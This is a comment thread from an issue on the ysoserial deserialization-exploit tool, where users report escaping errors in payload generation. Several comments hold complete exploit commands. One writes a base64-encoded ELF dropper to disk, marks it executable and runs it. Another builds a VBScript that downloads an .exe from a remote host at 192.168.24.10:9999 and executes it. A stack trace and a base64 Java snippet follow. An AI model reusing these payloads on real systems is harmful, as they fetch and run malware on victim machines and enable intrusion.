Comments (7)
so is ok
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'echo cm0gLXJmIG9rLmVsZjtlY2hvICJmMFZNUmdFQkFRQUFBQUFBQUFBQUFBSUFBd0FCQUFBQVZJQUVDRFFBQUFBQUFBQUFBQUFBQURRQUlBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFJQUVDQUNBQkFqUEFBQUFTZ0VBQUFjQ1kdjM0MU5EVTJvQ3NHYUo0YzJBbDF0b1lVQlJlR2dDQURBNWllRnFabGhRVVZlSjRVUE5nSVhBZVJsT2REMW9vZ0FBQUZocUFHb0ZpZU14eWMyQWhjQjV2ZXNuc2dlNUFCQUFBSW5qd2VzTXdlTU1zSDNOZ0lYQWVCQmJpZUdadGd5d0E4MkFoY0I0QXYvaHVBRUFBQUM3QVFBQUFNMkEifGJhc2U2NCAtZD5vay5lbGY7Y2htb2QgNTU1IG9rLmVsZjsuL29rLmVsZiAmCg== |base64 -d|sh'> tmp/payload.bin
from ysoserial.
I'd like to reopen this since it seems to be a genuine issue with escaping in the payload code generation.
from ysoserial.
Also seems to break with a different error in the multiarg branch:
$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'
Error while generating or serializing payload
javassist.CannotCompileException: [source error] syntax error near "t2AhcB4Av/huAEAAAC7A"
at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:124)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:105)
at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
at ysoserial.GeneratePayload.main(GeneratePayload.java:38)
Caused by: compile error: syntax error near "t2AhcB4Av/huAEAAAC7A"
at javassist.compiler.Parser.parseArrayInitializer(Parser.java:677)
at javassist.compiler.Parser.parseNew(Parser.java:1287)
...
from ysoserial.
thanks @frohoff
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar BeanShell1 'cmd.exe /c del poc.vbs& del mess.exe& @echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs&@echo objXMLHTTP.open "GET","http://192.168.24.10:9999/2410_4445.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs'
from ysoserial.
byte[] bytes = {...}
String str = new String(bytes, "UTF-8");
String cd="Holding some value";
Converting from string to byte[]:
byte[] cookie = new sun.misc.BASE64Decoder().decodeBuffer(cd);
Converting from byte[] to string:
cd = new sun.misc.BASE64Encoder().encode(cookie);
https://stackoverflow.com/questions/1536054/how-to-convert-byte-array-to-string-and-vice-versa
from ysoserial.
Any of these errors should be resolved by #151
from ysoserial.